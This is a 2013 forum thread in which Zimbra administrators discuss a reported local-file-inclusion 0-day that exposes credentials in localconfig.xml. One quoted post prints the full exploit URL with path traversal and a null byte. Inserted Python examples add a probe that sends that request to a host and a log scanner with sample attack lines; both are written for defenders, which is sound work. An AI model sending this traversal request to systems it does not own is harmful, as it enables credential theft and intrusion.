zimbra 0-day

phoenix
Ambassador
Posts: 26713
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

zimbra 0-day

Postby phoenix » Tue Dec 10, 2013 4:38 am

Please see the following:

http://www.zimbra.com/forums/known-issues/67237-security-guidance-reported-0day-exploit.html#post322495

I'll say this again: if anyone thinks that the current version of Zimbra is still vulnerable to this problem, please file a bug report - that would be the correct place for this and will get the attention of the Developers quicker than posting ad-hoc comments in the forums.


Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
expert_az
Posts: 29
Joined: Fri Sep 12, 2014 11:13 pm

zimbra 0-day

Postby expert_az » Tue Dec 10, 2013 5:32 am

phoenix, I tried to use Zimbra Bugzilla; it's not working for me. I could not log in to Bugzilla with my old account (password reset), then created a new one, with no success.
By the way, the 0-day exploit is reported as Bug#: 85249
phoenix
Ambassador
Posts: 26713
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

zimbra 0-day

Postby phoenix » Tue Dec 10, 2013 6:42 am

[quote user="expert_az"]phoenix, I tried to use Zimbra Bugzilla; it's not working for me. I could not log in to Bugzilla with my old account (password reset), then created a new one, with no success.[/QUOTE]It works fine for me; make sure you don't have anything blocking it in your browser (or clear the cache).

Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
anndro
Posts: 2
Joined: Sat Sep 13, 2014 3:27 am

zimbra 0-day

Postby anndro » Tue Dec 10, 2013 6:46 am

I reported Bug#: 85249 but still UNCONFIRMED
nrc
Posts: 27
Joined: Fri Sep 12, 2014 10:29 pm

zimbra 0-day

Postby nrc » Tue Dec 10, 2013 8:09 am

[quote user="expert_az"]I can confirm, the LFI is working on the latest 8.0.5 and after 7.2.2.
The LFI is located at:

/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Zimbra - 0day exploit / Privilege escalation via LFI[/QUOTE]
When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability?
It would be helpful at this point if Zimbra would open bug #80338 for review so that the community can understand the solution that was applied and assess whether what they're seeing now is expected behavior.
Also, I note that the prescribed exploit for this bug expects access to the admin console port (7071). Eliminating that doesn't solve the underlying LFI problem but in general I think it's a bad idea to have your admin console publicly accessible on the Internet.
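The check nrc describes, as an added example that is not code from any poster in this thread or from Zimbra: it builds the request shape quoted above and classifies the reply, so an admin can tell a leaked localconfig.xml apart from the normal message-bundle response that the thread later concludes is expected. The leak marker strings, the bundle pattern and the two sample bodies are assumptions constructed for illustration; nothing here is captured from a real server.

```python
"""Probe helper for the /res/ bundle endpoint discussed in this thread.

Added example; not code from the forum posters or from Zimbra.  It builds
the request shape quoted above and classifies the reply so an admin can
distinguish a leaked localconfig.xml from the normal message-bundle response.
Marker strings and the sample bodies are constructed assumptions.
"""
import gzip
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import quote

# Path from the exploit URL quoted in the thread (already percent-encoded).
RES_PATH = ("/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,"
            "Ajx%20TemplateMsg.js.zgz")
# Traversal payload from the thread plus the trailing NUL (sent as %00).
TRAVERSAL = "../../../../../../../../../opt/zimbra/conf/localconfig.xml\x00"

# Strings that only appear if the server really returned localconfig.xml
# (assumed markers; any one of them counts as a confirmed leak).
LEAK_MARKERS = (b"<localconfig", b"zimbra_ldap_password", b"mysql_root_password")
# Shape of the legitimate JavaScript message bundle the endpoint serves.
BUNDLE_RE = re.compile(rb"\b(?:AjxMsg|ZmMsg|I18nMsg|ZMsg)\.\w+\s*=")


def probe_url(host, scheme="https"):
    """Return the probe URL for `host`; the 'v' cache-buster is arbitrary."""
    skin = quote(TRAVERSAL, safe="/")          # "../" kept, NUL becomes %00
    return f"{scheme}://{host}{RES_PATH}?v=091214175450&skin={skin}"


def decode_body(raw):
    """.zgz content is served pre-gzipped; inflate if the magic bytes match."""
    if raw[:2] == b"\x1f\x8b":
        return gzip.decompress(raw)
    return raw


def classify(status, raw):
    """Map (HTTP status, raw body) to: not_found, leak, bundle or unknown."""
    if status == 404:
        return "not_found"
    body = decode_body(raw)
    if any(marker in body for marker in LEAK_MARKERS):
        return "leak"
    if BUNDLE_RE.search(body):
        return "bundle"
    return "unknown"


def fetch(url, timeout=10):
    """GET `url` without transparent decoding; return (status, raw body)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


# Constructed sample bodies (not captured from any real server).
SAMPLE_LEAK = gzip.compress(
    b'<?xml version="1.0"?>\n<localconfig>\n'
    b'<key name="zimbra_ldap_password"><value>REDACTED</value></key>\n'
    b'</localconfig>\n')
SAMPLE_BUNDLE = gzip.compress(
    b'AjxMsg.ok = "OK";\nZmMsg.inbox = "Inbox";\nZmMsg.sent = "Sent";\n')


if __name__ == "__main__":
    # Usage: python probe.py mail.example.com  (hostname is an assumption)
    host = sys.argv[1] if len(sys.argv) > 1 else "mail.example.com"
    url = probe_url(host)
    print("probing", url)
    print("verdict:", classify(*fetch(url)))
```

A "bundle" verdict is the harmless settings list several posters saw; only "leak" means the traversal reached the filesystem. Run it against your own hosts only.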
liverpoolfcfan
Outstanding Member
Posts: 948
Joined: Sat Sep 13, 2014 12:47 am

zimbra 0-day

Postby liverpoolfcfan » Tue Dec 10, 2013 8:32 am

[quote user="nrc"]When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability? [/QUOTE]
I can confirm that on 7.2.5 the URL returns lots of settings but NOT anything from the localconfig.xml file.
expert_az
Posts: 29
Joined: Fri Sep 12, 2014 11:13 pm

zimbra 0-day

Postby expert_az » Wed Dec 11, 2013 1:47 am

[quote user="nrc"]When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability?
It would be helpful at this point if Zimbra would open bug #80338 for review so that the community can understand the solution that was applied and assess whether what they're seeing now is expected behavior.
Also, I note that the prescribed exploit for this bug expects access to the admin console port (7071). Eliminating that doesn't solve the underlying LFI problem but in general I think it's a bad idea to have your admin console publicly accessible on the Internet.[/QUOTE]
nrc, you are right, the data coming back after hitting the URL used by the exploit is not localconfig.xml. But I'm getting a long list of settings even on 8.0.5; is this normal?
nrc
Posts: 27
Joined: Fri Sep 12, 2014 10:29 pm

zimbra 0-day

Postby nrc » Thu Dec 12, 2013 7:19 pm

[quote user="3636JakeMS"]Hey guys.
From a quick bit of testing the admin one is fixed.
However hitting your ZCS 8.0.5 server with:

https://mail.yourdomain.com/opt/zimbra/conf/localconfig.xml

Doesn't appear to pull localconfig.xml however is instead pulling a language file of some sort?[/QUOTE]
When I hit the URL you posted on my 8.0.3 system I get a 404 error, which is what I would expect. I really don't understand why anything in that namespace would respond.
The original URL used in the exploit appears to be hitting an API call that is intended to return configuration settings. I can't find the documentation for that specific call but as long as it's only returning the intended information and not arbitrary files through an LFI then it should be harmless.
nrc
Posts: 27
Joined: Fri Sep 12, 2014 10:29 pm

zimbra 0-day

Postby nrc » Fri Dec 13, 2013 8:57 pm

[quote user="3636JakeMS"]I've just checked my previous post.
It would seem vBulletin scrapped most of the URL.

[/QUOTE]
Ah! That makes more sense. Yes, I believe what you're seeing now is the expected response from an API request. I still see the same thing with version 8.0.6.
sugiggs
Advanced member
Posts: 92
Joined: Sat Sep 13, 2014 12:42 am

zimbra 0-day

Postby sugiggs » Mon Dec 30, 2013 1:42 am

Other than the obvious "upgrade to the latest version", any other way to "patch" this?
I have one installation still using version 6
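For a host that cannot be upgraded yet, as an added example that is not code from this thread or from Zimbra: a scanner over proxy access-log lines that flags any request whose `skin` parameter carries directory traversal or a NUL byte, which is the request shape quoted earlier in the thread. It does not patch anything; it tells you whether that request has been arriving. The log format (nginx "combined") and the three sample lines are constructed assumptions, so adjust `LOG_RE` to whatever your front-end proxy writes.

```python
"""Scan access-log lines for traversal in the 'skin' query parameter.

Added example; not code from the thread or from Zimbra.  The log format
(nginx 'combined') and the sample lines are constructed assumptions.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def suspicious_skin(target):
    """Return the decoded 'skin' value if it contains traversal or a NUL."""
    query = urlsplit(target).query
    for value in parse_qs(query, keep_blank_values=True).get("skin", []):
        decoded = unquote(value)          # second pass catches %252e%252e%252f
        if "../" in decoded or "..\\" in decoded or "\x00" in decoded:
            return decoded
    return None


def scan(lines):
    """Return (ip, timestamp, status, decoded skin) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        bad = suspicious_skin(m.group("target"))
        if bad is not None:
            hits.append((m.group("ip"), m.group("ts"), m.group("status"), bad))
    return hits


# Bundle path from the thread, reused to build the sample lines below.
RES = ("/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,"
       "Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=")

# Constructed sample log lines (RFC 5737 addresses; not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2013:04:38:00 +0000] "GET ' + RES
    + '../../../../../../../../../opt/zimbra/conf/localconfig.xml%00'
    + ' HTTP/1.1" 200 6021 "-" "curl/7.33.0"',
    '198.51.100.7 - - [10/Dec/2013:04:39:12 +0000] "GET ' + RES
    + 'harmony HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    # Double-encoded variant of the same traversal.
    '203.0.113.5 - - [10/Dec/2013:04:40:03 +0000] "GET ' + RES
    + '%252e%252e%252f%252e%252e%252fopt%252fzimbra%252fconf%252flocalconfig.xml'
    + ' HTTP/1.1" 200 6021 "-" "curl/7.33.0"',
]


if __name__ == "__main__":
    # Usage: python scan_skin.py < /opt/zimbra/log/nginx.access.log
    import sys
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_LOG
    for ip, ts, status, skin in scan(source):
        print(f"{ts} {ip} status={status} skin={skin!r}")
```

Lines whose `skin` is a plain skin name (the second sample) are ignored; the status column is worth watching, since a 200 on a traversal request is what needs the follow-up probe against the response body.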
